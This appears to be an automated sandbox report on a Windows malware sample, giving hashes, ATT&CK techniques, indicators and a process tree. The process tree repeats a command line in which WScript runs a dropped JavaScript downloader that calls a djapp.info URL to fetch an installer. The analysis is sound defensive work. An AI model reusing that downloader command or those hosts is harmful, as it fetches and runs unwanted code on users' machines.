198c59a752f50610e3462e5ab92ae0b0aed212d1f6f067d0c6b9a4d114be60ef

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12/10/2024, 22:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe
Size

184KB
MD5

3c51adfda9c14566f4eba73aa2e93772
SHA1

adcaf8ae4c8b9751a428a5b06ace280436323574
SHA256

198c59a752f50610e3462e5ab92ae0b0aed212d1f6f067d0c6b9a4d114be60ef
SHA512

337730dca4fc280b0c8df829f511291e93bbc85ee6e0f81aa4721a8b19b32ec57860de47504f96d39b99f36b9afe4255bee0bef4a5f864f56a8b6e7cfb02804c
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO36:/7BSH8zUB+nGESaaRvoB7FJNndn3

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2156	WScript.exe
8	2156	WScript.exe
10	2156	WScript.exe
12	2652	WScript.exe
13	2652	WScript.exe
15	1816	WScript.exe
16	1816	WScript.exe
19	2676	WScript.exe
20	2676	WScript.exe
22	2576	WScript.exe
23	2576	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2156	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	30
PID 2380 wrote to memory of 2156	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	30
PID 2380 wrote to memory of 2156	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	30
PID 2380 wrote to memory of 2156	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	30
PID 2380 wrote to memory of 2652	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	33
PID 2380 wrote to memory of 2652	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	33
PID 2380 wrote to memory of 2652	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	33
PID 2380 wrote to memory of 2652	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	33
PID 2380 wrote to memory of 1816	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	35
PID 2380 wrote to memory of 1816	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	35
PID 2380 wrote to memory of 1816	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	35
PID 2380 wrote to memory of 1816	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	35
PID 2380 wrote to memory of 2676	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	37
PID 2380 wrote to memory of 2676	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	37
PID 2380 wrote to memory of 2676	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	37
PID 2380 wrote to memory of 2676	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	37
PID 2380 wrote to memory of 2576	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	39
PID 2380 wrote to memory of 2576	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	39
PID 2380 wrote to memory of 2576	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	39
PID 2380 wrote to memory of 2576	2380	3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3c51adfda9c14566f4eba73aa2e93772_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB819.js" http://www.djapp.info/?domain=paGtxeWPxQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB819.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2156
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB819.js" http://www.djapp.info/?domain=paGtxeWPxQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB819.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2652
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB819.js" http://www.djapp.info/?domain=paGtxeWPxQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB819.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1816
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB819.js" http://www.djapp.info/?domain=paGtxeWPxQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB819.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2676
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB819.js" http://www.djapp.info/?domain=paGtxeWPxQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB819.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
b0b7b83cf944ceed6291194dd8171373

SHA1
4124ead002579ef46234ae5b8d65cbeffac788e3

SHA256
1839468bf68fdc587ff123626d59a9107fc2167bf42da0ef091b1da4397e5c03

SHA512
0bd0f6da5e83309fff0c5da0b3dc5e69ff7465d969e4b16b601b90b377a84800c17a8fa175e877cfb3142c768a71ee61d269014dfd4da4bde75ae8cecac87780

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
05e7cc01ecbb0513b626ed2f3ec04699

SHA1
e9388b39f09dc0ea8e699b75a867827dd8d1a6fe

SHA256
c25405ccd54d8ed3de06ca49e67a11467a5828a2868d9972cb2b9811bf627fd5

SHA512
6a8e4f97ec8774da698a23cbee7d05351a393573e3fd5002baa91d580ee8933759fa4a477ad0a9f8699ff0c93425b96cc664716d7897198f076f7eb5be003f4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
6KB

MD5
8c8e47af5db96793f13d186fd7214869

SHA1
42afbe4bee401a204426e7d6e78d0933e9b75176

SHA256
42e172d8c9aef8f99e88a3ad4d4630fcfbedc7d3f2c710e74eaca3802feff009

SHA512
663c90bba1949044bb13b441a693b5d9d51126156dd2aeda7ca45272601b3a36270e8a7e085218bb0433a72aa53a0b6ba542a5313154740523f32c14e36faf24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
c6fb3407c4fa1ebfc96fb41dbb0be746

SHA1
7c75cb9e91c832c990de03769faf3c069a8183a6

SHA256
b8fbf3d58e39c6858930964eba04dcd7f99a0d3675dbd08d33820a79c66bbefc

SHA512
df2f83deece6526e8a96910ccf152d90328c5393be7c3047403a0d7f2d198623ec004466fc71d433ce9db7756b1c3b90a6b27f9b86673a4ca33d4ccb46c9aaff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
3570e03eae531858221a156f09fe7c4c

SHA1
ffa689cabb7a2e2cf0f3e8fcecea13dd21ee76d8

SHA256
3185af7d4fbc68da3d69616232d55f6e71e955d5e01388f9126e648d8dc2756c

SHA512
5749763d9defe707c02126eab7de9f76605a0d42c3b17fd30f8daa294693924436309bbfce145f87c0c617943bd9af27bf58ca6736ad63940cc3307779f1414f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
3cf746324e46de3618c1ec0684f4cba9

SHA1
1c39ce883ca847291d2c1980997f36c4baa55199

SHA256
ec8e39a5d016509c833efcd60fbaf1835d621164deeed95ad0aae024759a3716

SHA512
4fee6a46c0c54e642b7eea8d4e844a7a7e35e911e1fb0fe605f45b0249c9bc80a8c07e70b98e5ea7b4c10bcabb7a7ed645abe93c47dd5f2b78712aefd99d6ac9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFFA3.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar17E5.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufB819.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\YSLWYHZZ.txt

Filesize
177B

MD5
595265a932c19ea6f120217b3beb8da5

SHA1
97ed8a0b178a1d3a08b66f5463596952b1bb9693

SHA256
b1f54729718329fabeba2fb6859531807c054b6d4c6e82a0279a552ac0781f43

SHA512
6816c36fc5aad867c00ebf0fc8bb2651e52527cf0df48aa1cc86aec5e1ead2f5b35fa00f0a031b90d7873592d3915cad638999bd68250471b5cbbfb2ba88938f

Download Submit